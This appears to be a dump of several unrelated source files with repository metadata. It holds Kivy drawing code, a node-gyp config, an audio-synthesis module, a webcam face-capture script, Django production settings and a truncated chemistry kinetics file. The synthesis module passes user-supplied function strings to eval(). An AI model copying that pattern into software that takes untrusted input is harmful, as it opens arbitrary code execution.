def build(self, field_function, low_left: Vector, high_right: Vector, step, paint_accuracy=20):
self.calc(field_function, low_left, high_right, step)
self.paint(paint_accuracy)
self.normalize(step * 0.8)
def draw_background(self, color):
self.canvas.add(color)
self.canvas.add(Rectangle(pos=(0, 0), size=Window.size))
def draw_path(self, low_left: Vector, high_right: Vector, color=Color(1, 1, 1, 1)):
low_left = self.map_v(low_left)
high_right = self.map_v(high_right)
self.canvas.add(color)
self.canvas.add(Line(points=(low_left, (low_left.x, high_right.y)), width=1))
self.canvas.add(Line(points=((low_left.x, high_right.y), high_right), width=1))
self.canvas.add(Line(points=(high_right, (high_right.x, low_left.y)), width=1))
self.canvas.add(Line(points=((high_right.x, low_left.y), low_left), width=1))
def draw_cross(self, center=Vector(0, 0), size=1, color=Color(0.20, 0.20, 0.20, 1)):
x_left = self.map_v(Vector(center.x - size, center.y))
x_right = self.map_v(Vector(center.x + size, center.y))
y_low = self.map_v(Vector(center.x, center.y - size))
y_high = self.map_v(Vector(center.x, center.y + size))
self.canvas.add(color)
self.canvas.add(Line(points=(x_left, x_right), width=5))
self.canvas.add(Line(points=(y_low, y_high), width=5))
| [
"2slavrov@gmail.com"
] | 2slavrov@gmail.com |
92d788f518b31c7450b6c783c2fe0e6b817f1f9c | 8d44166d504bcfb5411f853cb43ee7ca152ba7e1 | /node_modules/mongoose/node_modules/mongodb/node_modules/kerberos/build/config.gypi | ae121d3299f74d154c797e24f253a3fd691dc205 | [
"Apache-2.0",
"MIT"
] | permissive | ChessEvents/player-update-schedule | 1030d1393be779c3c79600f762307da3f83c5ad1 | c7af402a8fa85d2e34f453fc56e9456252c5f840 | refs/heads/master | 2021-01-10T18:17:15.087439 | 2015-12-08T11:58:15 | 2015-12-08T11:58:15 | 47,544,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,837 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in\\icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps\\icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "true",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "true",
"openssl_no_asm": 0,
"python": "C:\\Python27\\python.exe",
"target_arch": "x64",
"uv_library": "static_library",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"visibility": "",
"want_separate_host_toolset": 0,
"nodedir": "C:\\Users\\mattweb\\.node-gyp\\0.12.7",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"access": "",
"always_auth": "",
"bin_links": "true",
"browser": "",
"ca": "",
"cache": "C:\\Users\\mattweb\\AppData\\Roaming\\npm-cache",
"cache_lock_retries": "10",
"cache_lock_stale": "60000",
"cache_lock_wait": "10000",
"cache_max": "Infinity",
"cache_min": "10",
"cafile": "",
"cert": "",
"color": "true",
"depth": "Infinity",
"description": "true",
"dev": "",
"editor": "notepad.exe",
"engine_strict": "",
"fetch_retries": "2",
"fetch_retry_factor": "10",
"fetch_retry_maxtimeout": "60000",
"fetch_retry_mintimeout": "10000",
"force": "",
"git": "git",
"git_tag_version": "true",
"global": "",
"globalconfig": "C:\\Program Files\\nodejs\\etc\\npmrc",
"globalignorefile": "C:\\Program Files\\nodejs\\etc\\npmignore",
"group": "",
"heading": "npm",
"https_proxy": "",
"http___localhost_3000": "",
"if_present": "",
"ignore_scripts": "",
"init_author_email": "",
"init_author_name": "",
"init_author_url": "",
"init_license": "ISC",
"init_module": "C:\\Users\\mattweb\\.npm-init.js",
"init_version": "1.0.0",
"json": "",
"key": "",
"link": "",
"local_address": "",
"long": "",
"message": "%s",
"node_version": "0.12.7",
"npat": "",
"onload_script": "",
"optional": "true",
"parseable": "",
"prefix": "C:\\Program Files\\nodejs",
"production": "",
"proprietary_attribs": "true",
"rebuild_bundle": "true",
"registry": "https://registry.npmjs.org/",
"rollback": "true",
"save": "true",
"save_bundle": "",
"save_dev": "",
"save_exact": "",
"save_optional": "",
"save_prefix": "^",
"scope": "",
"searchexclude": "",
"searchopts": "",
"searchsort": "name",
"shell": "C:\\windows\\system32\\cmd.exe",
"shrinkwrap": "true",
"sign_git_tag": "",
"spin": "true",
"strict_ssl": "true",
"tag": "latest",
"tag_version_prefix": "v",
"tmp": "C:\\Users\\mattweb\\AppData\\Local\\Temp",
"umask": "0000",
"unicode": "true",
"unsafe_perm": "true",
"usage": "",
"user": "",
"userconfig": "C:\\Users\\mattweb\\.npmrc",
"user_agent": "npm/2.14.0 node/v0.12.7 win32 x64",
"version": "",
"versions": "",
"viewer": "browser"
}
}
| [
"mattweb@WH5003167.Adgency-Domain.Ad-Gency.com"
] | mattweb@WH5003167.Adgency-Domain.Ad-Gency.com |
4364a1093c7563e3ca1d4b13b6b23db59f3141d7 | 769d8f3aa2f112fa1b98ce989e80c5bae5dffeba | /calculations.py | 4732116e762321debba51817a3eb7c8ff4dc238d | [] | no_license | Babdus/martians | 434962e579e51a01c42055b62ace8f03d2c10e71 | f07d39a08e84bce4db9cd74e724d171815200acd | refs/heads/master | 2022-02-02T23:12:14.756536 | 2022-01-30T14:43:10 | 2022-01-30T14:43:10 | 222,629,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,526 | py | import numpy as np
import math
from scipy.stats import norm
constants = ['e', 'pi']
np_functions = [
'power',
'abs',
'sqrt',
'log10',
'log2',
'log',
'arcsinh',
'arccosh',
'arctanh',
'arcsin',
'arccos',
'arctan',
'sinh',
'cosh',
'tanh',
'sin',
'cos',
'tan',
'rint'
]
def function_parser(f):
f = f.replace(' ', '')
f = f.replace('^', '**')
if 'x' not in f:
f = f'(x/x)*({f})'
for constant in constants:
f = f.replace(constant, f'math.{constant}')
f = f.replace('round', 'rint')
for i, func in enumerate(np_functions):
f = f.replace(func, chr(i + 65))
for i in range(len(np_functions)):
f = f.replace(chr(i + 65), f'np.{np_functions[i]}')
return f
def get_samples(length, sample_rate, start=0):
return np.linspace(start, length+start, int(sample_rate * length), endpoint=False)
def parse_frequency_function(frequency_function_string, duration, sample_rate):
f = function_parser(frequency_function_string)
x = get_samples(duration, sample_rate)
frequency_function = eval(f)
frequency_function = np.nan_to_num(frequency_function, nan=0.0)
return frequency_function
def get_sine_wave(frequency, duration, sample_rate, amplitude=1):
samples = get_samples(duration, sample_rate)
return np.sin(2 * np.pi * frequency * samples) * amplitude
def initialize_signal(duration, sample_rate):
return np.zeros(get_samples(duration, sample_rate).shape)
def initialize_formant_function(n_overtones, value=0.0):
return np.full(n_overtones, value)
def get_formant(n_overtones, mu, sigma, amplitude):
samples = get_samples(n_overtones, 1, start=1)
bell_curve = norm.pdf(samples, mu, sigma)
return bell_curve / np.max(bell_curve) * amplitude
def normalize(array):
return array / np.max(array)
def add_overtones_to_signal(signal, frequency_function, duration, sample_rate, formants, n_overtones):
formant_functions = []
for formant in formants:
formant_functions.append(get_formant(n_overtones, formant['mu'], formant['sigma'], formant['amplitude']))
overtones = initialize_formant_function(n_overtones, value=(1.0 if len(formant_functions) == 0 else 0.0))
for formant_function in formant_functions:
overtones += formant_function
overtones = normalize(overtones)
last_signal_max = np.max(signal)
signal = initialize_signal(duration, sample_rate)
for overtone, amplitude in enumerate(overtones, start=1):
signal += get_sine_wave(frequency_function * overtone, duration, sample_rate, amplitude)
return (signal * last_signal_max) / np.max(signal), overtones
def reverse_signal(signal):
return np.flip(signal)
def change_sign(signal):
return -signal
def add_noise(signal, duration, sample_rate, noise_frequency, noise_amount):
samples_1 = np.linspace(0, duration, int(sample_rate * duration), endpoint=False)
noise_wave = np.sin(2 * np.pi * noise_frequency * samples_1)
noise_wave *= np.random.rand(samples_1.shape[0]) * noise_amount
signal += noise_wave
return normalize(signal)
def shift_signal(signal, shift, sample_rate):
shift_samples = int(sample_rate * shift)
shifted_signal = np.pad(signal, (shift_samples,), 'constant', constant_values=(0, 0))[:signal.shape[0]]
signal += shifted_signal
return normalize(signal)
def add_gain(signal, gain):
signal *= gain
signal = np.where(signal > 1, 1, signal)
signal = np.where(signal < -1, -1, signal)
return signal
def parse_amplitude_function(f, duration, sample_rate):
f = function_parser(f)
x = np.linspace(0, duration, int(sample_rate * duration), endpoint=False)
y = eval(f)
return y
def modify_amplitude_with_function(signal, y):
signal *= y
return signal
def get_attack_curve(attack_duration, attack_degree, duration, sample_rate):
samples = get_samples(duration, sample_rate)
attack_curve = np.power(samples, 2 ** attack_degree) / np.power(attack_duration, 2 ** attack_degree)
attack_curve = np.where(attack_curve > 1, 1, attack_curve)
return attack_curve
def get_decay_curve(decay_start, decay_duration, decay_degree, duration, sample_rate):
samples = get_samples(decay_duration, sample_rate)
decay_degree = -decay_degree
decay_curve = 1 - np.power(samples, 2 ** decay_degree) / np.power(decay_duration, 2 ** decay_degree)
decay_curve = np.where(decay_curve > 1, 1, decay_curve)
decay_curve = np.where(decay_curve < 0, 0, decay_curve)
n_samples_before_start_decay = int(decay_start * sample_rate)
n_samples_after_end_decay = int(sample_rate * duration) - n_samples_before_start_decay - int(
sample_rate * decay_duration)
n_samples_after_end_decay = n_samples_after_end_decay if n_samples_after_end_decay > 0 else 0
decay_curve = np.pad(decay_curve, (n_samples_before_start_decay, n_samples_after_end_decay), 'edge')
decay_curve = decay_curve[:int(sample_rate * duration)]
return decay_curve
def apply_attack_and_decay(signal, attack_curve, decay_curve):
signal *= attack_curve * decay_curve
return signal
def signal_pipeline(properties, sample_rate):
duration = properties['duration']
frequency_function_string = properties['frequency_function_string']
frequency_function = parse_frequency_function(frequency_function_string, duration, sample_rate)
signal = get_sine_wave(frequency_function, duration, sample_rate)
n_overtones = properties['timbre']['n_overtones']
formants = properties['timbre']['formants']
signal, overtones = add_overtones_to_signal(signal, frequency_function, duration, sample_rate, formants,
n_overtones)
for modifier_properties in properties['modifier_properties']:
if 'Reverse' in modifier_properties:
if modifier_properties['Reverse']['horizontal']:
signal = reverse_signal(signal)
if modifier_properties['Reverse']['vertical']:
signal = change_sign(signal)
elif 'Overdrive' in modifier_properties:
signal = add_gain(signal, modifier_properties['Overdrive']['gain'])
elif 'Shifted copy' in modifier_properties:
signal = shift_signal(signal, modifier_properties['Shifted copy']['shift'], sample_rate)
elif 'Noise' in modifier_properties:
signal = add_noise(signal, duration, sample_rate, modifier_properties['Noise']['noise_frequency'],
modifier_properties['Noise']['noise_amount'])
elif 'Amplitude custom function' in modifier_properties:
y = parse_amplitude_function(modifier_properties['Amplitude custom function']['f'], duration, sample_rate)
signal = modify_amplitude_with_function(signal, y)
elif 'Amplitude envelope' in modifier_properties:
attack_curve = get_attack_curve(modifier_properties['Amplitude envelope']['attack_duration'],
modifier_properties['Amplitude envelope']['attack_degree'], duration,
sample_rate)
decay_curve = get_decay_curve(modifier_properties['Amplitude envelope']['decay_start'],
modifier_properties['Amplitude envelope']['decay_duration'],
modifier_properties['Amplitude envelope']['decay_degree'], duration,
sample_rate)
signal = apply_attack_and_decay(signal, attack_curve, decay_curve)
return signal
def mix(signals, sample_rate, bpm, beats_per_bar, signal_index_matrix):
beat_duration = 60 / bpm
sample_per_beat = int(beat_duration * sample_rate)
sample_per_bar = sample_per_beat * beats_per_bar
bar_duration = (sample_per_beat * beats_per_bar) / sample_rate
final_signal = np.zeros(sample_per_bar)
for i, column in enumerate(signal_index_matrix):
for j, i_signal in enumerate(column):
if i_signal is None:
continue
signal = signals[i_signal]['signal']
if len(signal) + sample_per_beat * i > sample_per_bar:
final_signal[sample_per_beat * i:] += signal[:sample_per_bar - sample_per_beat * i]
else:
final_signal[sample_per_beat * i:sample_per_beat * i + len(signal)] += signal
return final_signal, bar_duration
| [
"babdusi@gmail.com"
] | babdusi@gmail.com |
88be4411af61e5a31ecce0d735c030caace852a6 | 4ab2dcfbd4541639f96922ad684f558c64c9ba28 | /facedata.py | 33f99518985dd6c525ed800d8c9d042de49a3529 | [] | no_license | adirayer/Face-Recognition | d3d1839f4aa414c78d2078cbb8cd8d439bf05ba3 | 913abce48f1bff83e1a978417a1c5e402f806824 | refs/heads/main | 2023-06-10T21:19:57.547372 | 2021-07-06T07:34:03 | 2021-07-06T07:34:03 | 383,380,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,975 | py | # Write a Python Script that captures images from your webcam video stream
# Extracts all Faces from the image frame (using haarcascades)
# Stores the Face information into numpy arrays
# 1. Read and show video stream, capture images
# 2. Detect Faces and show bounding box (haarcascade)
# 3. Flatten the largest face image(gray scale) and save in a numpy array
# 4. Repeat the above for multiple people to generate training data
import cv2
import numpy as np
#Init Camera
cap = cv2.VideoCapture(0)
# Face Detection
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
skip = 0
face_data = []
dataset_path = './data/'
file_name = input("Enter the name of the person : ")
while True:
ret,frame = cap.read()
if ret==False:
continue
gray_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(frame,1.3,5)
if len(faces)==0:
continue
faces = sorted(faces,key=lambda f:f[2]*f[3])
# Pick the last face (because it is the largest face acc to area(f[2]*f[3]))
for face in faces[-1:]:
x,y,w,h = face
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)
#Extract (Crop out the required face) : Region of Interest
offset = 10
face_section = frame[y-offset:y+h+offset,x-offset:x+w+offset]
face_section = cv2.resize(face_section,(100,100))
skip += 1
if skip%10==0:
face_data.append(face_section)
print(len(face_data))
cv2.imshow("Frame",frame)
cv2.imshow("Face Section",face_section)
key_pressed = cv2.waitKey(1) & 0xFF
if key_pressed == ord('q'):
break
# Convert our face list array into a numpy array
face_data = np.asarray(face_data)
face_data = face_data.reshape((face_data.shape[0],-1))
print(face_data.shape)
# Save this data into file system
np.save(dataset_path+file_name+'.npy',face_data)
print("Data Successfully save at "+dataset_path+file_name+'.npy')
cap.release()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | noreply@github.com |
d7b04cf9763076a4c1f742e7b8007d7ecbca812c | 5211bf6e6178b6130d8fc167fd910a50be88bee2 | /piglatin/settings_production.py | 9baf9da65cf9ea830e1ab47f9d2287cd37f8a5be | [] | no_license | velikooutro/django_translator | fd9c576615093fa56441be3dc2d94789d9291d3f | dc358516d66f57c1eb96bed8f36c1c16b8620103 | refs/heads/master | 2021-01-23T12:34:45.867714 | 2017-06-02T17:51:33 | 2017-06-02T17:51:33 | 93,176,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py |
# Inherit from standard settings file for defaults
from piglatin.settings import *
# Everything below will override our standard settings:
# Parse database configuration from $DATABASE_URL
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Set debug to False
DEBUG = False
# Static asset configuration
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage' | [
"veliko.outro@gmail.com"
] | veliko.outro@gmail.com |
12098a4349966f1bb91731bacb395b298b3dec81 | 04803c70bb97012b7d500a177ac0240fb2ddbe38 | /3heptane_pdep/pdep/network42_1.py | ba15fe7bcaabbec6ac0c67a81fd946ab69ff1f2e | [] | no_license | shenghuiqin/chpd | 735e0415f6688d88579fc935459c1b0f53596d1d | 396ba54629036e3f2be0b3fabe09b78c90d56939 | refs/heads/master | 2023-03-01T23:29:02.118150 | 2019-10-05T04:02:23 | 2019-10-05T04:02:23 | 192,084,217 | 0 | 0 | null | 2019-06-18T18:33:13 | 2019-06-15T13:52:28 | HTML | UTF-8 | Python | false | false | 51,612 | py | species(
label = 'CCCC(CCC)O[O](138)',
structure = SMILES('CCCC(CCC)O[O]'),
E0 = (-164.605,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4082.6,'J/mol'), sigma=(7.30891,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=637.69 K, Pc=23.73 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.385645,0.0992146,-7.63202e-05,3.28023e-08,-6.09818e-12,-19642.1,35.265], Tmin=(100,'K'), Tmax=(1218.12,'K')), NASAPolynomial(coeffs=[12.329,0.0574631,-2.49073e-05,4.66449e-09,-3.23359e-13,-22739.7,-28.5844], Tmin=(1218.12,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-164.605,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(552.912,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'O2(2)',
structure = SMILES('[O][O]'),
E0 = (-8.62178,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1483.7],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (31.9988,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(887.157,'J/mol'), sigma=(3.467,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.53764,-0.00122827,5.36759e-06,-4.93128e-09,1.45955e-12,-1037.99,4.6718], Tmin=(100,'K'), Tmax=(1087.71,'K')), NASAPolynomial(coeffs=[3.16427,0.00169454,-8.00335e-07,1.5903e-10,-1.14891e-14,-1048.45,6.08303], Tmin=(1087.71,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.62178,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""O2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[CH]CCC(73)',
structure = SMILES('CCC[CH]CCC'),
E0 = (-21.1865,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3025,407.5,1350,352.5,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (99.194,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3350.7,'J/mol'), sigma=(6.3658,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=523.37 K, Pc=29.47 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.869629,0.0703718,-3.49835e-05,7.97988e-09,-7.11975e-13,-2437.92,29.442], Tmin=(100,'K'), Tmax=(2507.38,'K')), NASAPolynomial(coeffs=[23.6823,0.0339797,-1.3213e-05,2.19165e-09,-1.34869e-13,-13878.2,-101.587], Tmin=(2507.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-21.1865,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(507.183,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJCC)"""),
)
species(
label = 'CCC[CH]O[O](143)',
structure = SMILES('CCC[CH]O[O]'),
E0 = (107.961,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,492.5,1135,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,180,180],'cm^-1')),
HinderedRotor(inertia=(0.120261,'amu*angstrom^2'), symmetry=1, barrier=(2.76503,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120067,'amu*angstrom^2'), symmetry=1, barrier=(2.76059,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120388,'amu*angstrom^2'), symmetry=1, barrier=(2.76796,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.48129,'amu*angstrom^2'), symmetry=1, barrier=(11.0658,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.80224,0.0553008,-3.67942e-05,-1.19722e-08,2.59231e-11,13057,21.9545], Tmin=(100,'K'), Tmax=(531.454,'K')), NASAPolynomial(coeffs=[5.7889,0.0367206,-1.66008e-05,3.14924e-09,-2.19362e-13,12471.9,3.72327], Tmin=(531.454,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(107.961,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOOH) + radical(ROOJ)"""),
)
species(
label = 'npropyl(70)',
structure = SMILES('[CH2]CC'),
E0 = (87.0621,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000],'cm^-1')),
HinderedRotor(inertia=(0.0928812,'amu*angstrom^2'), symmetry=1, barrier=(2.13552,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.092914,'amu*angstrom^2'), symmetry=1, barrier=(2.13628,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (43.0877,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2218.31,'J/mol'), sigma=(4.982,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.02816,0.0147023,2.40511e-05,-3.6674e-08,1.38612e-11,10512.1,12.4699], Tmin=(100,'K'), Tmax=(984.463,'K')), NASAPolynomial(coeffs=[6.16542,0.0184495,-6.7903e-06,1.23049e-09,-8.63868e-14,9095.06,-6.676], Tmin=(984.463,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(87.0621,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""npropyl""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,25472.7,-0.459785], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[C](CCC)O[O](144)',
structure = SMILES('CCC[C](CCC)O[O]'),
E0 = (22.2936,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([360,370,350,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,492.5,1135,1000,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
